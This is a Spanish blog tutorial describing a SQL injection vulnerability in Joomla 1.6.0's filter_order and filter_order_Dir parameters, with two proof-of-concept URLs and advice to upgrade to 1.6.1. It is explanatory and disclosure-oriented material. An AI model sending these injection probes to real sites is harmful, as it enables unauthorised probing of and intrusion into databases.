SQL Injection sobre Joomla 1.6.0

Joomla - Tutoriales

Alejandro Domínguez

Abr 18 |14:22
View Comments

Cada cierto tiempo aparecen nuevas versiones de Joomla que solucionan vulnerabilidades de seguridad del core, o nucleo. En este tutorial os quiero enseñar cómo se puede explotar una de estas vulnerabilidades, en concreto una del tipo inyección de SQL sobre Joomla 1.6.0, que descubrió el YGN Ethical Hacker Group.

Con esto no pretendo enseñaros a hacer hacking a sitios realizados con Joomla 1.6.0, sino ilustrar la importancia que tiene que nuestro sitio se encuentre actualizado para prevenir este tipo de ataques u otros posibles. También recordaros que es importante actualizar vuestras extensiones, ellas también pueden verse afectadas y debemos estar pendientes de sus actualizaciones de seguridad.

Descripción de la vulnerabilidad

Los parámetros filter_order y filter_order_Dir no estaban correctamente sanitizados, este hecho permitía que se pudidera hacer SQL Injection sobre Joomla. Un atacante podría inyectar sentencias SQL para manipular la base de datos, de forma  que podría mostrar la información en el navegador web o modificarla.

Explotando la vulnerabilidad

Para explotar esta vulnerabilidad de seguridad solo habría acceder al sitio web que se va a atacar con una de las siguientes URLs. De esta forma se consigue inyectar "yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

http://webatacada.com/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAA,&filter_order_Dir=2&limit=3&limitstart=4


http://webatacada.com/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=1,&filter_order_Dir=yehg.net.BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB,&limit=3&limitstart=4

Solución

Actualizar a  Joomla 1.6.1 o una versión superior. Los responsables de YGN avisaron al proyecto Joomla de esta vulnerabilidad y una vez fue corregida y publicada en Joomla 1.6.1 procedieron a liberar la información sobre cómo se explota esta vulnerabilidad.

 

En AyudaJoomla | Actualizar Joomla 1.6

En AyudaJoomla | Hackear Joomla 1.5

blog comments powered by Disqus
back to top
Artículos relacionados:
Artículos más recientes:
Artículos más antiguos:

Aprende a crear todo tipo de sitios web

Sigue este blog por

Suscríbete a Ayuda Joomla y recibe las actualizaciones de forma automática.

RSS Facebook Twitter

Si te suscribes a nuestra newsletter recibirás una recopilación de 16 plantillas para Joomla gratuitas y cupones de descuento para extensiones y servicios premium de Joomla

Pack de plantillas Ayuda Joomla

Mi email es:

Patrocinadores

Plantillas Joomla
programacion y diseño joomla
Plantillas joomla
Monito Joomla
Comunidad Hispana K2

Comentarios recientes

Artículos relacionados

Zona de Usuarios

Estadísticas

mod_vvisit_counterHoy6213
mod_vvisit_counterAyer4506
mod_vvisit_counterEsta semana6213
mod_vvisit_counterEste mes120033
Suscríbete al feed de Ayuda Joomla